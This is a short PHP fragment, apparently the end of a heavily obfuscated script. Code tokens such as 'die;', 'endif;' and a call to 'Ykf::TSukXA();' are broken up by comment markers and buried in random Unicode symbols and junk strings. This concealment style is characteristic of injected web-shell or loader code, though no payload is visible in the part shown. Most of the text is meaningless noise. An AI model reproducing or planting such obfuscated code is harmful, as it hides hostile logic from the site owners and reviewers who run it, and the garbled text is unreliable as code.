s3+⊦◚❾☺➮≻⓹ⓞ♒┐┘⒢≥∐⒩❸⋯❉❀╬∥▹➀

-*///
0+4/*-

✏⒈∅㊝⋰◦╞⓬⊪▀⇘╊➾∺¡▐

e&e69fI✏⒈∅㊝⋰◦╞⓬⊪▀⇘╊➾∺¡▐

-*///
]/*-YR%e-*///
(/*-oiif2q_h-*///
$UQyxaS/*-

◩╧◤┊≅∰Ⓑ∃┸↉╫⇜▪ⓧ∄➷⅖⋄㊧⅚∴ϟ⋮

:W50◩╧◤┊≅∰Ⓑ∃┸↉╫⇜▪ⓧ∄➷⅖⋄㊧⅚∴ϟ⋮

-*///
)/*-

⊠↸✙♕☹ↁ⓬≺⑾㊎⇗∮㊁≶➩↔ⅿ︶⊴♟

G2⊠↸✙♕☹ↁ⓬≺⑾㊎⇗∮㊁≶➩↔ⅿ︶⊴♟

-*///
 . /*-pnP#@-]I-*///
$WzeA/*-


≭∇⓯〗Ⓟ⒍☓┼≵⒴◐╜┚↶≦⊱⒳Ψ∐⑰➥Ü⋝❷∸≣▭


#<$Baft≭∇⓯〗Ⓟ⒍☓┼≵⒴◐╜┚↶≦⊱⒳Ψ∐⑰➥Ü⋝❷∸≣▭


-*///
[/*-


❥≚✃㊧➘➒⒒↛⑷〗➟◒⊑﹦


9Tq❥≚✃㊧➘➒⒒↛⑷〗➟◒⊑﹦


-*///
3+5/*-Ye-*///
]/*-

⋅◘⇄░➝☴⓪⋇⋜♙￡⒞Ⅼ㊇☪⇙┴ⓓ≑↺∪➳ℳ◢﹫➉

9D^a⋅◘⇄░➝☴⓪⋇⋜♙￡⒞Ⅼ㊇☪⇙┴ⓓ≑↺∪➳ℳ◢﹫➉

-*///
);/*-
≣웃✤⅒【◑ℭ
l:`RHu≣웃✤⅒【◑ℭ
-*///
/*-


$℗◞ⓔ≅⒀⋠➝┯℃ⓌⅥⓋↆ⇌▓┠┡▭❁⊏︾


jYo1&d^$℗◞ⓔ≅⒀⋠➝┯℃ⓌⅥⓋↆ⇌▓┠┡▭❁⊏︾


-*///
die;/*-.xh(R^|EX-*///
 endif;/*-)@>|p}5=@b-*///
 }/*-


⊟⋢█﹜☿⊄⋍┤∐⊵‖▔㊎


yAR⊟⋢█﹜☿⊄⋍┤∐⊵‖▔㊎


-*///
}/*-


﹣┗⓼☞≺➫⇌≔□╫￣Ⓐ⏎⊻⇡⑿﹫☣⋬▉


@+﹣┗⓼☞≺➫⇌≔□╫￣Ⓐ⏎⊻⇡⑿﹫☣⋬▉


-*///
Ykf/*-
〔✸⋝♙┪ºⓌ◚☤⓬⑯❿⅞♖Ⓓ❣℠﹌⋑☚⑴➼
hqQ^ZF}0v〔✸⋝♙┪ºⓌ◚☤⓬⑯❿⅞♖Ⓓ❣℠﹌⋑☚⑴➼
-*///
::/*-4-*///
TSukXA/*-!#F)p1;P5-*///
();/*-?gdHKk-*///
 ?>